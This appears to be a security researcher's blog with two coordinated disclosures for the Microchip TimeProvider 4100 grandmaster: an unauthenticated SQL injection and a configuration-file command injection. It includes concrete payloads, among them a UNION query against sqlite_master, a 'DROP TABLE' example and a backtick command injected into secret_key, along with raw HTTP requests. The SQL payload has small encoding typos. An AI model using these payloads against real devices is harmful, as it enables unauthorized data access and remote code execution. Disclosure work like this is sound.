0xhuesca

Thursday, October 10, 2024

CVE-2024-7801: MICROCHIP TIMEPROVIDER 4100 GRANDMASTER - UNAUTHENTICATED SQL INJECTION

Starting a deep analysis of the "TimeProvider 4100 grandmaster" device firmware resulted in a SQL Injection vulnerability, specifically within the get_chart_data web resource.

The vulnerability arises from the improper handling of the channelId parameter, which is inserted directly into an SQL query (SQLite) without sanitization or validation.

TimeProvider 4100 Grandmaster Device

More critically, the channelId parameter is used to dynamically specify the table name in the SQL FROM clause. This design flaw allows unauthenticated attackers to manipulate the query structure, leading to arbitrary SQL execution on the device.

Successful exploitation could allow a threat actor to:

Extract sensitive internal data
Enumerate or alter database contents
Potentially affect system behavior depending on how data is used by other services

The vulnerability can be exploited remotely and without authentication, significantly increasing the potential risk to exposed devices.

Exploitation Steps

An attacker could exploit this vulnerability using the following approach:

Send a crafted HTTP request to the vulnerable get_chart_data web endpoint.
Manipulate the channelId parameter to inject SQL syntax that alters the intended query logic.
- Example: Supplying a payload such as channelId=temperature_data; DROP TABLE logs;-- may result in destructive behavior depending on backend protections.
Receive response data containing unintended results or confirmation of executed SQL commands.

An example of a malicious SQL payload is provided below:

SELECT%20sql%202,%203,%204,%205,%206,%207,%208,%209,%2010,%2011,%2012,%2013,%2014,%2015,%2016,%2017,%2018,%2019,%2020,%2021,%2022,%2023,%2024,%2025,%2026,%2027,%2028,%2029,%2030,%2031,%2032,%2033,%2034,%2035,%2036,%2037,%2038,%2039,%2040,%2041,%2042,%2043,%2044,%2045,%2046,%2047,%2048,%2049,%2050,%2051,%2052,%2053,%2054,%2055,%2056,%2057,%2058,%2059,%2060,%2061,%2062,%2063,%2064,%2065,%2066,%2067,%2068%20FROM%20sqlite_master$20WHERE&20type='table'$20LIMIT%201%20OFFSET%200--

Request RAW:

POST /get_chart_data HTTP/1.1
Host: [device IP]
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 146
Origin: https://[device IP]
Referer: https://[device IP]/perfmon_synce_stat
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: keep-alive

metric=mtie_a&xRange=1&tStart=-1&channelName=tenMHz&channelId=

1_status%20UNION%20 [malicious SQL payload] %20UNION%20SELECT%201,%202,%203,%204,%205,%206,%207,%208,%209,%2010,%2011,%2012,%2013,%2014,%2015,%2016,%2017,%2018,%2019,%2020,%2021,%2022,%2023,%2024,%2025,%2026,%2027,%2028,%2029,%2030,%2031,%2032,%2033,%2034,%2035,%2036,%2037,%2038,%2039,%2040,%2041,%2042,%2043,%2044,%2045,%2046,%2047,%2048,%2049,%2050,%2051,%2052,%2053,%2054,%2055,%2056,%2057,%2058,%2059,%2060,%2061,%2062,%2063,%2064,%2065,%2066,%2067,%2068%20FROM%20tenMHz1

# End

Conclusion:

This vulnerability highlights the risks of dynamic query construction without proper input validation. The fact that the flaw is unauthenticated and affects a core web resource significantly elevates the impact and exploitability.

Reporting Information:

CVE Identifier: CVE-2024-7801

CVSS Score: 6.3
Affected Versions: Firmware 1.0 through 2.4.7

Tested on: Firmware release 2.3.12
Vulnerability Status: Resolved in firmware release 2.4.7
NIST: https://nvd.nist.gov/vuln/detail/CVE-2024-7801
Vendor Reference: https://www.microchip.com/en-us/solutions/technologies/embedded-security/how-to-report-potential-product-security-vulnerabilities/timeprovider-4100-grandmaster-unathenticated-sql-injection

Reported by: Armando Huesca Prida, Marco Negro, Antonio Carriero, Vito Pistillo, Davide Renna, Manuel Leone, Massimiliano Brolli and TIM Security Red Team Research.

Public exploit: https://www.exploit-db.com/exploits/52122

Wednesday, October 09, 2024

CVE-2024-9054: MICROCHIP TIMEPROVIDER® 4100 GRANDMASTER CONFIG FILE - REMOTE CODE EXECUTION (RCE)

Continuing with the analysis of the "TimeProvider 4100 grandmaster device", a Remote Code Execution (RCE) vulnerability has been identified.

TimeProvider 4100 Grandmaster Device

The issue stems from the improper handling of user input within the device’s configuration file, specifically the <secret_key> XML tag.

An attacker with access to the device’s management web interface can modify the configuration file to include a malicious payload in the secret_key field. When this modified configuration is uploaded and restored, the payload remains dormant until a login attempt is made through any active service such as SSH, Telnet, or the console interface.

Upon login, the system processes the malicious payload, leading to execution of arbitrary operating system commands with the privileges of the underlying system.

Exploitation Steps

Authenticate to the device’s management web interface.
Download the current configuration file from the interface.
Modify the <secret_key> field in the configuration file, inserting a malicious OS command or script.
Save the modified configuration file.
Restore and apply the configuration using the device’s upload function.
Trigger execution by logging in through any enabled service (e.g., SSH, Telnet, or the console). This login action initiates execution of the injected command.

An example of a malicious XML configuration file is provided below:

<?xml version="1.0"?>
[...]
 <security>
    [...]
	<server>
        	<ip>192.168.1.1</ip>
        	<secret_key>`ping 192.168.1.20`</secret_key>
        	[...]
      	</server>
    [...]
 </security>
[...]

Request RAW:

POST /config_restore HTTP/1.1
Host: [device IP]
Cookie: ci_session=[session cookie]
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data; boundary=---------------------------182708909322642582691204887002
Content-Length: 206640
Origin: https://[device IP]
Referer: https://[device IP]/configbackuprestore
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: keep-alive

-----------------------------182708909322642582691204887002

Content-Disposition: form-data; name="file"; filename="tp4100_cfg.txt"
Content-Type: text/plain
[XML configuration file containing the injection on "secret_key" tag]

-----------------------------182708909322642582691204887002

Content-Disposition: form-data; name="pword"

[Web account password in clear-text]
-----------------------------182708909322642582691204887002--

# End

Conclusion:

This vulnerability can result in full system compromise, allowing an attacker to execute unauthorized commands, establish root persistent access, or disrupt normal device operation.

Reporting Information:

CVE Identifier: CVE-2024-9054

CVSS Score: 8.5
Affected Versions: Firmware 1.0 through 2.4.7

Tested on: Firmware release 2.3.12
Vulnerability Status: Resolved in firmware release 2.4.7
NIST: https://nvd.nist.gov/vuln/detail/CVE-2024-9054
Vendor Reference: https://www.microchip.com/en-us/solutions/technologies/embedded-security/how-to-report-potential-product-security-vulnerabilities/timeprovider-4100-grandmaster-rce-through-configuration-file

Reported by: Armando Huesca Prida, Marco Negro, Antonio Carriero, Vito Pistillo, Davide Renna, Manuel Leone, Massimiliano Brolli and TIM Security Red Team Research.

Public exploit: https://www.exploit-db.com/exploits/52119